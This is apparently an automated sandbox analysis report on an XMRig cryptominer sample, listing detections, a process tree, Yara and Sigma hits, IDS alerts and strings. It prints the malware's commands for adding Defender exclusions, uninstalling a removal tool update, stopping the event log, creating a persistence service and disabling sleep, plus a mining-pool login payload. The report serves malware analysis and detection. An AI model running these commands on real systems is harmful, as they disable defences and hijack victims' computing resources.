
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1584229
MD5: a03484846e3418ffa2ab8aec97a03e88
SHA1: 54c62c97db8b0234eeb7a03d66b73f9d1dc22614
SHA256: 6932616523c8080fd908d4b776f416a4d32653e657c2cbe75a42cdc0a8b5c4d1
Tags: CoinMiner, exe, x64, user-jstrosch

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A03484846E3418FFA2AB8AEC97A03E88)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5068 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6664 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 5600 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3304 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3876 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 616 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6768 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7120 cmdline: C:\Windows\system32\sc.exe delete "LightService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1476 cmdline: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7156 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7108 cmdline: C:\Windows\system32\sc.exe start "LightService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • driver.exe (PID: 7064 cmdline: C:\ProgramData\IGaming\driver.exe MD5: A03484846E3418FFA2AB8AEC97A03E88)
    • powershell.exe (PID: 1784 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5988 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3276 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5084 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1436 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5340 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7120 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 2876 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 528 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: dump.pcap, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security

Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION
Source: Process Memory Space: dialer.exe PID: 528, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: Process Memory Space: dialer.exe PID: 528, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x29e79:$a1: mining.set_target
  • 0x26622:$a2: XMRIG_HOSTNAME
  • 0x2739a:$a3: Usage: xmrig [OPTIONS]
  • 0x26603:$a4: XMRIG_VERSION

Source: 45.2.dialer.exe.140000000.0.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 45.2.dialer.exe.140000000.0.unpack, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
Source: 45.2.dialer.exe.140000000.0.unpack, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 45.2.dialer.exe.140000000.0.unpack, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet

Change of critical system settings

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5600, ProcessName: powercfg.exe

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe
Source: Network Connection, Author: Florian Roth (Nextron Systems), Data: DestinationIp: 141.94.96.144, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\dialer.exe, Initiated: true, ProcessId: 528, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6768, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto", ProcessId: 1476, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5840, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4524, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7156, ProcessName: sc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-04T22:58:13.875308+0100 | 2047928 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 59674 | 1.1.1.1 | 53 | UDP
2025-01-04T22:58:02.999130+0100 | 2051004 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 57089 | 83.217.209.235 | 80 | TCP
2025-01-04T22:58:19.921055+0100 | 2051004 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 49705 | 83.217.209.235 | 80 | TCP
2025-01-04T22:59:18.545663+0100 | 2051004 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 57087 | 83.217.209.235 | 80 | TCP
2025-01-04T22:58:02.999130+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 49704 | 141.94.96.144 | 8080 | TCP


AV Detection

Source: C:\ProgramData\IGaming\driver.exe, ReversingLabs: Detection: 81%
Source: file.exe, Virustotal: Detection: 80%
Source: file.exe, ReversingLabs: Detection: 81%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTR
Source: global traffic, TCP traffic: 192.168.2.5:49704 -> 141.94.96.144:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4335mezgwwsmbw161uqp6waqyxztrvxwsbpkzpxtxxah4mtoxxbierhgbab8xhdzaemkwwvnp49wwk5ribj37ak2azkaekr","pass":"xc","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: dialer.exe, String found in binary or memory: cryptonight-monerov7
Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: dialer.exe, 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: driver.exe, 0000001A.00000003.2145145649.000001F307E70000.00000004.00000001.00020000.00000000.sdmp, ftnvuqwjtdwb.sys.26.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000033.00000002.3369152171.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2173615180.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2173436542.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3367839566.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ~1.PDB @ source: svchost.exe, 00000033.00000000.2173514506.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3368381949.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
